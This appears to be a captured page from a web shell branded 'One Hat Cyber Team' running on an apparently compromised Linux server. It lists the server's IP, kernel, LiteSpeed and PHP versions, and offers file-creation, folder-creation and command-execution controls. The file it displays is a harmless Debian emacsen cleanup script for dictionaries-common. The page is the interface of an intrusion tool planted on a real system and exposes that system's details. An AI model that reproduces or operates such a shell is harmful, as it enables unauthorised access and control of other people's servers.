⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.90
Server IP:
104.21.80.1
Server:
Linux vmi2315822.contaboserver.net 5.15.0-134-generic #145-Ubuntu SMP Wed Feb 12 20:08:39 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.3.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
emacsen-common
/
packages
/
remove
/
View File Name :
dictionaries-common
#!/bin/sh # # emacsen remove script for the Debian GNU/Linux # dictionaries-common package # # Written by Rafael Laboissiere <rafael@debian.org> and # Agustin Martin <agmartin@debian.org> based on # Dirk Eddelbuettel <edd@debian.org> script for the octave package. # ----------------------------------------------------------------- set -e # Canadian spelling ;-) flavour=$1 package=dictionaries-common destination=/usr/share/${flavour}/site-lisp/${package} if [ -d $destination ]; then echo remove/${package}: Purging byte-compiled files for flavour ${flavour} rm -f ${destination}/*.elc ${destination}/*.el ${destination}/done ${destination}/.nosearch rmdir --ignore-fail-on-non-empty ${destination} fi exit 0;